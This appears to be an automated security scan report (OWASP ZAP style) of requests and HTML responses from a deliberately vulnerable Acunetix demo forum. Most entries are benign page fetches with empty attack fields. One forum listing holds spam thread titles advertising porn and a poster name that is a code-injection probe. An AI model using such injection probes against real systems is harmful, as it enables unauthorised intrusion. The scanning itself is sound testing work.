| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=9 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 402 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Templatize.asp?item=html/about.html Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 3673 |
| Response Body - size: 3,673 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Search.asp |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 308 bytes. |
GET http://testasp.vulnweb.com/Search.asp HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 2809 |
| Response Body - size: 2,809 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum search</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form name="frmSearch" method="get" action=""> <div class="FramedForm"> <input name="tfSearch" type="text" class="search"> <input class="search" type="submit" value="search posts"> </div> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 332 bytes. |
GET http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 2961 |
| Response Body - size: 2,961 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum search</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form name="frmSearch" method="get" action=""> <div class="FramedForm"> <input name="tfSearch" type="text" class="search"> <input class="search" type="submit" value="search posts"> </div> </form> <div class='path'>You searched for 'ZAP'</div><table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"></table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showforum.asp?id=0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 316 bytes. |
GET http://testasp.vulnweb.com/showforum.asp?id=0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 178 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 10037 |
| Response Body - size: 10,037 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Acunetix Web Vulnerability Scanner</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> Acunetix Web Vulnerability Scanner </div> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Thread</td> <td class="tableheader">Posts</td> <td class="tableheader">Posted by</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>42</a></div></td><td>36</td><td>Pedro Miguel</td><td>3/13/2022 2:43:15 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=1'>42</a></div></td><td>7</td><td>Pedro Miguel</td><td>3/13/2022 3:13:51 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=2'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=3'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=4'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=5'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=6'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=7'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=8'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=9'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=10'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=11'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=12'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=13'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=14'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=15'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=16'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=17'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=18'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=19'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=20'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=21'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=22'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=23'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=24'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=25'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=26'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=27'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=28'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=29'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=30'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:13:43 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=31'>Hot galleries, daily updated collections</a></div></td><td>1</td><td>victoriadi1</td><td>3/13/2022 10:23:53 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=32'>Big Ass Photos - Free Huge Butt Porn, Big Booty Pics</a></div></td><td>1</td><td>susanac1</td><td>3/13/2022 12:03:13 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=33'>Best Nude Playmates & Centerfolds, Beautiful galleries daily updates</a></div></td><td>1</td><td>kristiela3</td><td>3/13/2022 3:28:51 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=34'>New hot project galleries, daily updates</a></div></td><td>1</td><td>friedajd1</td><td>3/13/2022 9:02:56 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=35'>Free Porn Pictures and Best HD Sex Photos</a></div></td><td>1</td><td>dianezg60</td><td>3/13/2022 11:25:30 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=36'>test</a></div></td><td>1</td><td>hanxuan</td><td>3/14/2022 1:14:17 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=37'>Hot photo galleries blogs and pictures</a></div></td><td>1</td><td>sethpq11</td><td>3/14/2022 2:11:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=38'>Mr.</a></div></td><td>1</td><td>${@print(md5(31337))}\</td><td>3/14/2022 4:18:48 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=39'>Shemale Sexy Galleries</a></div></td><td>1</td><td>ineshy11</td><td>3/14/2022 6:42:20 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=40'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn</a></div></td><td>1</td><td>myrnaou3</td><td>3/14/2022 7:22:30 AM</td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showforum.asp?id=1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 316 bytes. |
GET http://testasp.vulnweb.com/showforum.asp?id=1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 3101 |
| Response Body - size: 3,101 bytes. |
